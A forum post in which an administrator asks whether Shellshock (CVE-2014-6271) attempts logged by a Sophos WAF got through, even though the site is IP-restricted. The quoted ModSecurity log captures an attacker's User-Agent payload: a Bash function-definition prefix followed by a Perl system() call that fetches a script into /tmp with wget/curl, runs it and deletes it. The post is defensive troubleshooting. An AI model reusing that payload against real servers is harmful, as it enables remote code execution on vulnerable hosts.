We have an internal web site for users in various geographical locations available through a public IP. The site is only available to a small number of internal networks/IPs. The site is set up on the WAF and we restrict traffic using Site Path Routing (settings below) to only our pre-defined networks/IPs. The site is/was in monitor mode in the WAF firewall profile. When I was reviewing the Logging & Reporting>>Webserver Protection log details and I see that a public IP had attempted a number of BASH Attacks which was strange because the site is set up to only allow certain pre-defined networks.
When I look at the logs, shown below, the first entry is ‘Pattern match’ followed by ‘blacklist’ then followed by ‘client denied by server configuration’ and lastly the 403 error.
It is strange to me that Pattern match is first. Why is it inspecting the pattern before the IP checks? Why should it care about the pattern match if the IP is not allowed to access the site? If the IP is not allowed, then it seems like it should just toss the request and respond with a 403 error.
Keep in mind that the site was in monitor mode, although the site is on a Windows server.
My question is: The Webserver Protection log details page shows the BASH Attack, although the site is restricted to only certain networks/IPs. Did the BASH Attack attempt go through? - I know it’s a Windows server but I just like some clarity in how this works. I would like to think that the attacks did not go through just because the IP was restricted, although it was on the blacklist anyway, but then why is it showing as being pattern matched? The logs say that the client was denied, but was their BASH Attack discarded? Can someone clarify this?
Web site WAF settings:
WebServer Protection>>Web Application Firewall>>Site Path Routing
Access Control checked
Allowed network list all allowed networks that I have defined.
Denied network – empty
Logging & Reporting>>Webserver Protection log details:
969990 CVE-2014-6271 - Bash Attack
Web Server protection WAF logs:
sophos1 reverseproxy: [DateTime] [security2:error] [pid/tid] [client 206.xx.xx.x] ModSecurity: Warning. Pattern match "^\\(\\s*\\)\\s+{" at REQUEST_HEADERS:User-Agent. [file "/usr/apache/conf/waf/modsecurity_crs_generic_attacks.conf"] [line "258"] [id "969990"] [msg "CVE-2014-6271 - Bash Attack"] [data "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5cr\x5cn\x5cr\x5cnXSUCCESS!\x22;system(\x22wget -O /tmp/cox.pl;curl -O /tmp/cox.pl;perl /tmp/cox.pl;rm -rf /tmp/cox.pl*\x22);'"] [severity "CRITICAL"] [tag "CVE-2014-6271"] [hostname "x.x.x.x"] [uri "/"] [unique_id "VjoEFgo-FAQAAEUO0n4AAAAX"]
sophos1 reverseproxy: [DateTime] [authz_blacklist:warn] [pid/tid] [client 206.xx.xx.x:45019] Client is listed on DNSRBL black.rbl.ctipd.astaro.local
sophos1 reverseproxy: [DateTime] [authz_core:error] [pid/tid] [client 206.xx.xx.x:45019] AH01630: client denied by server configuration: proxy:balancer://6htuyi75re3/
sophos1 reverseproxy: id="0299" srcip="206.xx.xx.x" localip="" size="209" user="-" host="206.xx.xx.x" method="GET" statuscode="403" reason="-" extra="-" exceptions="-" time="6520" url="/" server="x.x.x.x" referer="-" cookie="-" set-cookie="-"
---- More similar to this as well not listed ----
Other errors:
sophos1 reverseproxy: [DateTime] [url_hardening:error] [pid/tid] [client 206.xx.xx.x:46849] Hostname in HTTP request (x.x.x.x) does not match the server name (REF_RevFroVwsMail_redirect_ssl)
sophos1 reverseproxy: id="0299" srcip="206.xx.xx.x" localip="" size="218" user="-" host="206.xx.xx.x" method="GET" statuscode="403" reason="-" extra="-" exceptions="-" time="417" url="/index.cgi" server="REF_RevFroVwsMail_redirect_ssl" referer="-" cookie="-" set-cookie="-"
sophos1 reverseproxy: [DateTime] [url_hardening:error] [pid/tid] [client 206.xx.xx.x:34101] Hostname in HTTP request (x.x.x.x) does not match the server name (REF_RevFroVwsMail_redirect_ssl)
sophos1 reverseproxy: id="0299" srcip="206.xx.xx.x" localip="" size="226" user="-" host="206.xx.xx.x" method="GET" statuscode="403" reason="-" extra="-" exceptions="-" time="522" url="/cgi-bin/query.cgi" server="REF_RevFroVwsMail_redirect_ssl" referer="-" cookie="-" set-cookie="-"
sophos1 reverseproxy: [DateTime] [url_hardening:error] [pid/tid] [client 206.xx.xx.x:34141] Hostname in HTTP request (x.x.x.x) does not match the server name (REF_RevFroVwsMail_redirect_ssl)
sophos1 reverseproxy: id="0299" srcip="206.xx.xx.x" localip="" size="228" user="-" host="206.xx.xx.x" method="GET" statuscode="403" reason="-" extra="-" exceptions="-" time="508" url="/cgi-bin/counter.cgi" server="REF_RevFroVwsMail_redirect_ssl" referer="-" cookie="-" set-cookie="-"
---- More similar to this as well not listed ----
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